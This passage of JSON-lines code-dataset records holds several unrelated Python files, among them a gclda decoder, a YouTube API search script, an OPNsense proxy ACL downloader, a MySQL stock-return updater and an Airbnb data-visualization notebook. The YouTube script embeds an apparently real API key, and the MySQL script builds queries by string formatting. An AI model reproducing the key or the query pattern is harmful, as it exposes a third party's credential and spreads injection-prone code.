topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def encode(self, text, out_file=None, topic_priors=None):\n \"\"\"\n Perform text-to-image encoding.\n\n 1. Compute p_topic_g_word.\n - p_topic_g_word = p_word_g_topic * p_topic / p_word\n - p_topic is uniform (1/n topics)\n 2. Compute topic weight vector (tau_t).\n - tau_t = np.sum(p_topic_g_word, axis=1) (across words)\n 3. Multiply tau_t by topic-by-voxel matrix of smoothed p_voxel_g_topic\n (A; not sure where it is, but I don't think it's the same as A in\n model.py).\n 4. The resulting map (tau_t*A) is the encoded image. 
Values are *not*\n probabilities.\n \"\"\"\n if isinstance(text, list):\n text = ' '.join(text)\n\n # Assume that words in word_labels are underscore-separated.\n # Convert to space-separation for vectorization of input string.\n vocabulary = [term.replace('_', ' ') for term in self.model.dataset.word_labels]\n max_len = max([len(term.split(' ')) for term in vocabulary])\n vectorizer = CountVectorizer(vocabulary=self.model.dataset.word_labels,\n ngram_range=(1, max_len))\n word_counts = np.squeeze(vectorizer.fit_transform([text]).toarray())\n keep_idx = np.where(word_counts > 0)[0]\n text_counts = word_counts[keep_idx]\n\n n_topics_per_word_token = np.sum(self.model.n_word_tokens_word_by_topic, axis=1)\n p_topic_g_word = self.model.n_word_tokens_word_by_topic / n_topics_per_word_token[:, None]\n p_topic_g_word = np.nan_to_num(p_topic_g_word, 0)\n p_topic_g_text = p_topic_g_word[keep_idx] # p(T|W) for words in text only\n prod = p_topic_g_text * text_counts[:, None] # Multiply p(T|W) by words in text\n topic_weights = np.sum(prod, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n _, p_voxel_g_topic = self.model.get_spatial_probs()\n voxel_weights = np.dot(p_voxel_g_topic, topic_weights)\n voxel_weights_matrix = unmask(voxel_weights, self.model.dataset.mask_img)\n\n img = nib.Nifti1Image(voxel_weights_matrix, self.model.dataset.mask_img.affine)\n if out_file is not None:\n img.to_filename(out_file)\n return img, topic_weights\n", "sub_path": "gclda/decode.py", "file_name": "decode.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "nilearn.masking.apply_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", 
"line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 148, "usage_type": "call"}, {"api_name": "nilearn.masking.unmask", "line_number": 149, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 151, "usage_type": "call"}, {"api_name": "due.due.dcite", "line_number": 18, "usage_type": "call"}, {"api_name": "due.due", "line_number": 18, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "148249861", "text": "from apiclient.discovery import build\n\n\nDEVELOPER_KEY = \"AIzaSyDngQv_cVeUuk1LMrqwvP0M-8s6XfgqpGs\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nsearch_response = youtube.search().list(\n q='asmr 귀',\n part=\"id,snippet\",\n maxResults=25\n ).execute()\n\nprint(search_response)", "sub_path": "startone.py", "file_name": "startone.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "apiclient.discovery.build", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "179958025", "text": "import multiprocessing\r\n\r\ndef myProcFn():\r\n print('Executing child process (with its own GIL)')\r\n\r\ndef main():\r\n print('Executign the main process')\r\n myProc2 = multiprocessing.Process(target=myProcFn)\r\n myProc2.start()\r\n myProc2.join()\r\n print('child process has terminated')\r\n\r\nif __name__ == '__main__':\r\n main()", "sub_path": "data/beyondAdvancedPythonApril2021-main/using_processes/p1_proc_fn.py", "file_name": "p1_proc_fn.py", "file_ext": "py", "file_size_in_byte": 336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "289374951", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ndef genDataSet(N):\n x = np.random.normal(0, 1, N)\n ytrue = (np.cos(x) + 2) / (np.cos(x * 1.4) + 2)\n noise = np.random.normal(0, 0.2, N)\n y = ytrue + noise\n return x, y, ytrue\n\nx, y, ytrue = genDataSet(100)\nplt.plot(x,y,'.')\nplt.plot(x,ytrue,'rx')\nplt.show()\n", "sub_path": "mulligan-03/hw3_1_a_gendata.py", "file_name": "hw3_1_a_gendata.py", "file_ext": "py", "file_size_in_byte": 330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.normal", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 14, "usage_type": "name"}]} +{"seq_id": "522957404", "text": "import serial\nimport time\nimport json\nimport random\nimport arena\nfrom threading import Thread\nfrom utils import send_alert2\n\n# Global for keeping track of which sensor to display data from\n\ntest_email = True\n\n\n\n\nemail_status= False\n\nif test_email and email_status==False:\n send_alert2()\n email_status=True\n\ndef start_serial():\n global sensor_to_read\n global reading_text\n\n\n\n global email_status \n# global test_email\n global door_status\n\n # set up the serial line\n ser = serial.Serial('COM4', 9600)\n time.sleep(2)\n \n \n while True:\n if email_status and door_status == True:\n ser.write(\"blink\\n\".encode())\n \n elif email_status and door_status == False:\n ser.write(\"dont blink\\n\".encode())\n time.sleep(1)\n\n ser.close()\n\n\ndef scene_callback(msg):\n print(\"scene_callback: \", msg)\n\narena.init(\"arena.andrew.cmu.edu\", \"realm\", \"patrick_scene\")#, scene_callback)\n\n\n\n\ndoor_status = False\ndef door_button_callback(event):\n global door_obj\n global door_status\n if event.event_type == arena.EventType.mousedown:\n if door_status:\n door_status = False\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\", \"from\": \"0 90 0\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 1000}}')\n else:\n door_status = True\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\",\"from\": \"0 0 0\", \"to\": \"0 90 0 \", \"loop\": false, \"dur\": 1000}}')\ndoor_obj = arena.Object(\n objName = \"door\",\n objType=arena.Shape.cube,\n scale=(0.1,2,1.2),\n location=(-9,1.6,-2),\n clickable=False,\n data='{\"animation\": { \"property\": \"rotation\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 0}}',\n)\nbutton_door = arena.Object(\n objName = \"button_dor\",\n objType=arena.Shape.cube,\n scale=(1,1,1),\n location=(-11,1.6,-3),\n clickable=True,\n callback=door_button_callback,\n color = (255,0, 255)\n)\n \n\nthread = Thread(target = start_serial)\nthread.start()\narena.handle_events()\n\nthread.join()", "sub_path": "misc_files/source_code/ECE202A-main/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.send_alert2", "line_number": 19, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "arena.init", "line_number": 51, "usage_type": "call"}, {"api_name": "arena.EventType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 67, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 69, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 75, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 77, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 86, "usage_type": "call"}, {"api_name": "arena.handle_events", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "604990399", "text": "#!/usr/local/bin/python2.7\n\n\"\"\"\n Copyright (c) 2015 Jos Schellevis - Deciso B.V.\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. 
Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport urllib2\nimport os\nimport os.path\nimport tarfile\nimport gzip\nimport zipfile\nimport StringIO\nimport syslog\nfrom ConfigParser import ConfigParser\n\nacl_config_fn = ('/usr/local/etc/squid/externalACLs.conf')\nacl_target_dir = ('/usr/local/etc/squid/acl')\nacl_max_timeout = 30\n\nclass ACLDownload(object):\n\n def __init__(self, url, timeout):\n \"\"\" init new\n \"\"\"\n self._url = url\n self._timeout = timeout\n self._source_data = None\n self._target_data = None\n\n def fetch(self):\n \"\"\" fetch (raw) source data into self._source_data\n \"\"\"\n try:\n f = urllib2.urlopen(self._url,timeout = self._timeout)\n self._source_data = f.read()\n f.close()\n except (urllib2.URLError, urllib2.HTTPError, IOError) as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s'%self._url)\n self._source_data = None\n\n def pre_process(self):\n \"\"\" pre process downloaded data, handle compression\n \"\"\"\n if self._source_data is not None:\n # handle compressed data\n if (len(self._url) > 8 and self._url[-7:] == '.tar.gz') \\\n or (len(self._url) > 4 and self._url[-4:] == '.tgz'):\n # source is in tar.gz format, extract all into a single string\n try:\n tf = tarfile.open(fileobj=StringIO.StringIO(self._source_data))\n target_data = []\n for tf_file in tf.getmembers():\n if tf_file.isfile():\n target_data.append(tf.extractfile(tf_file).read())\n self._target_data = ''.join(target_data)\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 4 and self._url[-3:] == '.gz':\n # source is in .gz format unpack\n try:\n gf = gzip.GzipFile(mode='r', fileobj=StringIO.StringIO(self._source_data))\n self._target_data = gf.read()\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 5 and self._url[-4:] == '.zip':\n # source is in .zip format, extract all into a single string\n target_data = []\n with zipfile.ZipFile(StringIO.StringIO(self._source_data),\n mode='r',\n compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n target_data.append(zf.read(item))\n self._target_data = ''.join(target_data)\n else:\n self._target_data = self._source_data\n\n def download(self):\n self.fetch()\n self.pre_process()\n\n def is_valid(self):\n \"\"\" did this ACL download successful\n \"\"\"\n if self._target_data is not None:\n return True\n else:\n return False\n\n def 
get_data(self):\n \"\"\" retrieve data\n \"\"\"\n # XXX: maybe some postprocessing is needed here, all will be used with a squid dstdom_regex tag\n return self._target_data\n\n\n# parse OPNsense external ACLs config\nif os.path.exists(acl_config_fn):\n # create acl directory (if new)\n if not os.path.exists(acl_target_dir):\n os.mkdir(acl_target_dir)\n # read config and download per section\n cnf = ConfigParser()\n cnf.read(acl_config_fn)\n for section in cnf.sections():\n # check if tag enabled exists in section\n if cnf.has_option(section,'enabled'):\n # if enabled fetch file\n target_filename = acl_target_dir+'/'+section\n if cnf.get(section,'enabled')=='1':\n if cnf.has_option(section,'url'):\n download_url = cnf.get(section,'url')\n acl = ACLDownload(download_url, acl_max_timeout)\n acl.download()\n if acl.is_valid():\n output_data = acl.get_data()\n with open(target_filename, \"wb\") as code:\n code.write(output_data)\n elif not os.path.isfile(target_filename):\n # if there's no file available, create an empty one (otherwise leave the last download).\n with open(target_filename, \"wb\") as code:\n code.write(\"\")\n # if disabled or not 1 try to remove old file\n elif cnf.get(section,'enabled')!='1':\n try:\n os.remove(acl_target_dir+'/'+section)\n except OSError:\n pass\n", "sub_path": "src/opnsense/scripts/proxy/fetchACLs.py", "file_name": "fetchACLs.py", "file_ext": "py", "file_size_in_byte": 6201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib2.URLError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib2.HTTPError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 61, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 73, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 80, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gzip.GzipFile", "line_number": 84, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 87, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 87, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 91, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "145311008", "text": "# -*- coding: utf-8 -*-\r\nimport re,pymysql\r\nconnection = 
pymysql.connect(host='127.0.0.1',port=3306,user='root',password='*',db='ysdd',charset='utf8')\r\ncursor = connection.cursor()\r\nsql=\"select ROE,ycpdays,cpdays,realid from cpgz where red=1 and zf=1\"\r\ncursor.execute(sql)\r\ndates = cursor.fetchall()\r\nfor date in dates:\r\n dalygrade = float(date[0][:-1]) / date[1]\r\n ROE = dalygrade * date[2]\r\n parameter = 0.3 + (date[2] / 5) * 0.5\r\n gROE = (ROE*1.113-parameter)*0.19+parameter if ROE*1.1113 > parameter else parameter\r\n wgROE = (ROE*1.113-parameter)*0.2+parameter if ROE*1.1113 > parameter else parameter\r\n fxROE = 10 * ROE - 9 * wgROE\r\n sql=\"update cpgz set dalygrade=%0.4f,gROE=%0.4f,ROE='%0.2f%%' where realid='%s'\" %(dalygrade,gROE,ROE,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\n sql = \"select stocks from hzb where realid='%s'\" %(date[3])\r\n cursor.execute(sql)\r\n stocks = cursor.fetchone()\r\n money = stocks[0] * (100+ROE) * 100\r\n sql=\"update hzb set investor='%0.2f%%',trader='%0.2f%%',money=%d where realid='%s'\" %(gROE,fxROE,money,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\nconnection.close()\r\n \r\n \r\n\r\n \r\n \r\n", "sub_path": "cpxz.py", "file_name": "cpxz.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymysql.connect", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "434590240", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Draw inline\nget_ipython().magic(u'matplotlib inline')\n\n# Set figure aesthetics\nsns.set_style(\"white\", {'ytick.major.size': 10.0})\nsns.set_context(\"poster\", font_scale=1.1)\n\n\n# In[2]:\n\n# Load the data into DataFrames\ntrain_users = pd.read_csv('../input/train_users_2.csv')\ntest_users = pd.read_csv('../input/test_users.csv')\n\n\n# In[4]:\n\nprint(train_users.shape[0],test_users.shape[0])\n\n\n# In[6]:\n\n# Merge train and test users\nusers = pd.concat((train_users, test_users), axis=0, ignore_index=True)\n\n# Remove ID\nusers.drop('id',axis=1, inplace=True)\n\nusers.head(10)\n\n\n# In[6]:\n\nusers.gender.replace('-unknown-', np.nan, inplace=True)\n\n\n# In[15]:\n\nusers_nan = (users.isnull().sum() / users.shape[0]) * 100\nusers_nan[users_nan > 0].drop('country_destination')\n\n\n# In[18]:\n\n#check\nprint(int((train_users.date_first_booking.isnull().sum() / train_users.shape[0]) * 100))\n\n\n# In[19]:\n\nusers.age.describe()\n\n\n# In[20]:\n\nprint(sum(users.age > 100))\nprint(sum(users.age < 18))\n\n\n# In[21]:\n\nusers[users.age > 100]['age'].describe()\n\n\n# In[22]:\n\nusers[users.age < 18]['age'].describe()\n\n\n# In[23]:\n\nusers.loc[users.age > 95, 'age'] = np.nan\nusers.loc[users.age < 13, 'age'] = np.nan\n\n\n# In[24]:\n\ncategorical_features = [\n 'affiliate_channel',\n 'affiliate_provider',\n 'country_destination',\n 'first_affiliate_tracked',\n 'first_browser',\n 'first_device_type',\n 'gender',\n 'language',\n 'signup_app',\n 'signup_method'\n]\n\nfor categorical_feature in categorical_features:\n users[categorical_feature] = users[categorical_feature].astype('category')\n\n\n# In[25]:\n\nusers['date_account_created'] = pd.to_datetime(users['date_account_created'])\nusers['date_first_booking'] = pd.to_datetime(users['date_first_booking'])\nusers['date_first_active'] = pd.to_datetime((users.timestamp_first_active // 1000000), format='%Y%m%d')\n\n\n# In[26]:\n\nseries = 
pd.Series(users.gender.value_counts(dropna=False))\n\n\n# In[28]:\n\nseries.plot.pie(figsize=(5, 5))\n\n\n# In[37]:\n\nwomen = sum(users['gender'] == 'FEMALE')\nmen = sum(users['gender'] == 'MALE')\n\nfemale_destinations = users.loc[users['gender'] == 'FEMALE', 'country_destination'].value_counts() / women * 100\nmale_destinations = users.loc[users['gender'] == 'MALE', 'country_destination'].value_counts() / men * 100\n\n# Bar width\nwidth = 0.4\n\nmale_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Male', rot=0)\nfemale_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Female', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[42]:\n\ndestination_percentage = users.country_destination.value_counts() / users.shape[0] * 100\ndestination_percentage.plot(kind='bar',color='#20B2AA', rot=0)\n# Using seaborn to plot\nsns.countplot(x=\"country_destination\", data=users, order=list(users.country_destination.value_counts().keys()))\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n# sns.despine()\n\n\n# In[44]:\n\nsns.kdeplot(users.age.dropna(), color='#20B2AA', shade=True)\nplt.xlabel('Age')\nplt.ylabel('Distribution of age')\nsns.despine()\n\n\n# In[45]:\n\nage = 40\n\nyounger = sum(users.loc[users['age'] < age, 'country_destination'].value_counts())\nolder = sum(users.loc[users['age'] > age, 'country_destination'].value_counts())\n\nyounger_destinations = users.loc[users['age'] < age, 'country_destination'].value_counts() / younger * 100\nolder_destinations = users.loc[users['age'] > age, 'country_destination'].value_counts() / older * 100\n\nyounger_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Youngers', rot=0)\nolder_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Olders', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[50]:\n\ndf=users.date_account_created.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('First create account')\n\n\n# In[51]:\n\ndf=users.date_first_active.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('Fisrt active account')\n\n", "sub_path": "Visualization.py", "file_name": "Visualization.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "seaborn.set_style", "line_number": 15, "usage_type": "call"}, {"api_name": "seaborn.set_context", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "296870774", "text": "try:\n import numpy as np\nexcept ImportError:\n raise Exception(\"numpy is required for pygme\")\n\nfrom numpy import asarray\nfrom numpy import cos, sin, sqrt, arctan\n\ntry:\n from scipy import interpolate\nexcept ImportError:\n raise Exception(\"scipy is required for pygme\")\n\nimport os\nfrom .rwcfor import floatMGE\nfrom pygme.dynMGE import dynMGE\nfrom pygme.paramMGE import dynParamMGE\nfrom pygme.mge_miscfunctions import sample_trunc_r2gauss, sample_trunc_gauss\n\n__version__ = '2.0.4 (24/10/2014)' # Changed default value for SigmaGas and fixed comment in realise_Nbody\n#__version__ = '2.0.3 (21/08/2013)' \n#__version__ = '2.0.2 
(16/01/2013)'\n# Version 2.0.3: Changed imin imax into ilist\n# Version 2.0.2: 16/01/2013 - Simplification in the derivation of sigR, sigZ, sigTheta\n# Version 2.0.1: 18/12/2012 - Adding the FacBetaEps factor as a parameter of the realise_Nbody routine\n\nclass nbodyMGE(dynMGE) :\n def __init__(self, infilename=None, indir=None, saveMGE=None, **kwargs) :\n dynMGE.__init__(self, infilename=infilename, indir=indir, saveMGE=saveMGE, **kwargs)\n\n########################################### N BODY #############################################\n ################################################################\n ### Generate N bodies consistent with the existing MGE model ###\n ################################################################\n def realise_Nbody(self, **kwargs):\n \"\"\" Generate particles within the potential defined by the MGE model\n Cuts in R and Z, in pc, are defined by Rcut and Zcut\n The number of particles and the way the particles have their\n dynamics derived is specified in the Ascii input MGE model\n (e.g. NGROUP, NDYNCOMP, NPARTGROUP1, 2, ...)\n Anisotropy can be specified in the input Ascii Model with\n numbers (if negative, the Spin will be reversed), 'epicycle' or 'betaeps'\n Rcut: cut in R, in pc - default is 50000\n Zcut: cut in Z, in pc - default is 50000\n mcut: cut in ellipsoidal coordinates, in pc (think of this as an ellipsoid with major-axis max radius = mcut )\n Default is 50000\n ComputeV: Boolean (True/False), if True (default) velocities are derived, otherwise only the positions\n GasDisk: Boolean (True/False), if True (default) the Gas component will have velocities compatible with a thin disk\n Otherwise, we will follow the prescription given by the kRZ and kRTheta components in the mge file\n SigmaGas: SigmaR, 